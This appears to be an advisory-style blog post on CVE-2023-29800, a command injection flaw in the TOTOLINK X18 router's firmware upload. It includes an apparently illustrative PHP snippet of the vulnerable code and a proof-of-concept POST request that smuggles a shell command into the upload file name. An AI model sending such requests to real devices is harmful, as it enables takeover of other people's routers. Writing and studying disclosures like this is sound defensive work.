TOTOLINK X18 V9.1.cu.2024_B20220329 is a popular wireless networking device and is widely used across different industries and consumers. Recently, a critical command injection vulnerability, CVE-2023-29800, was discovered in the device, which allows attackers to execute arbitrary commands on the target system by exploiting the FileName parameter in the UploadFirmwareFile function.

In this long-read post, we will delve into the details of the vulnerability, how it can be exploited, and what you can do to prevent and mitigate the risk associated with this vulnerability.

Vulnerability Details

The vulnerability in TOTOLINK X18 V9.1.cu.2024_B20220329 was discovered by security researchers who found that the FileName parameter in the UploadFirmwareFile function was not properly sanitized. This allows attackers to inject malicious commands through the FileName parameter, leading to command injection vulnerability.

The following code snippet illustrates the vulnerable UploadFirmwareFile function

function UploadFirmwareFile($filename) {
    //...
    $command = "tar zxvf " . $filename . " -C /tmp/firmware";
    system($command);
    //...
}

As you can see, the system call uses the unsanitized $filename user input, allowing an attacker to execute arbitrary commands by exploiting the FileName parameter.

Exploit Details and Proof of Concept

An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable device, inserting malicious commands through the FileName parameter. Here is a sample proof of concept:

POST /cgi-bin/firmwareUpload.cgi HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------157501700685107278671

-----------------------------157501700685107278671
Content-Disposition: form-data; name="file"; filename="test; touch /tmp/hacked;.tar.gz"
Content-Type: application/x-tar

...binary data...

-----------------------------157501700685107278671--

In this example, a file named test; touch /tmp/hacked;.tar.gz is included as the FileName payload. When the vulnerable function processes this payload, it will execute the touch /tmp/hacked command, resulting in the creation of a new file named hacked in the /tmp directory.

Original References

- CVE-2023-29800
- Security Advisory for TOTOLINK X18

Mitigation and Prevention

To mitigate and prevent the exploitation of this vulnerability, device owners and administrators are advised to:

1. Apply the latest firmware patch provided by TOTOLINK, which addresses the CVE-2023-29800 vulnerability. The update can be downloaded from the official TOTOLINK website.
2. Regularly monitor and review device logs to detect and respond to any anomalies that could indicate attempted or successful exploitation.
3. Restrict access to the web user interface of the device by implementing access control lists (ACLs) and IP filtering.
4. Use strong authentication mechanisms, such as complex passwords, to strengthen the security of the TOTOLINK X18 devices.

Conclusion

CVE-2023-29800 is a critical command injection vulnerability in TOTOLINK X18 V9.1.cu.2024_B20220329. By exploiting this vulnerability, attackers can execute arbitrary commands on the target system, potentially leading to severe consequences such as unauthorized access or control, sensitive data exfiltration, or even complete compromise of the device. It is crucial to apply the appropriate mitigation and prevention strategies to reduce the risk associated with this vulnerability.

Timeline

Published on: 04/14/2023 14:15:00 UTC
Last modified on: 04/21/2023 18:31:00 UTC